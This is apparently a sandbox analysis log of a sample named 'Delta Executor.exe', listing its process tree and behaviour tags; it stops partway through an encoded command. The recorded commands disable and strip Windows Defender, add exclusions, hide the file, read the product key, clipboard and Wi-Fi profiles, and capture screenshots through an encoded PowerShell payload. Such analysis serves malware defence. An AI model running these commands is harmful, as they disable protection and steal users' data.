C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Delta Executor.exe""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffef195cc40,0x7ffef195cc4c,0x7ffef195cc582⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2320,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2312 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1988,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2384 /prefetch:32⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2088,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2508 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3160 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3412 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4536,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4528 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4840 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4380,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5096,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5076 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4736,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4448 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4860,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4852,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4040 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5392,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5372 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=864,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5280 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5296,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5172 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3492,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4544,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5764,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5788 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5756,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5912 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5816,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6084 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5812,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6212 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5748,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6360 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5932,i,6521271952661732890,4185432242011158716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5920 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\Delta Executor.exe"C:\Users\Admin\Downloads\Delta Executor.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Downloads\Delta Executor.exe"C:\Users\Admin\Downloads\Delta Executor.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Delta Executor.exe'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Delta Executor.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please re execute the file!', 0, 'Delta Executor', 0+16);close()""4⤵
-
C:\Windows\system32\mshta.exemshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please re execute the file!', 0, 'Delta Executor', 0+16);close()"5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"4⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 25⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"4⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 25⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"4⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name5⤵
- Detects videocard installed
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Downloads\Delta Executor.exe""4⤵
- Hide Artifacts: Hidden Files and Directories
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\Downloads\Delta Executor.exe"5⤵
- Views/modifies file attributes
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵
-
C:\Windows\system32\tree.comtree /A /F5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"4⤵
- System Network Configuration Discovery: Wi-Fi Discovery
-
C:\Windows\system32\netsh.exenetsh wlan show profile5⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"4⤵
-
C:\Windows\system32\systeminfo.exesysteminfo5⤵
- Gathers system information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"4⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath5⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgA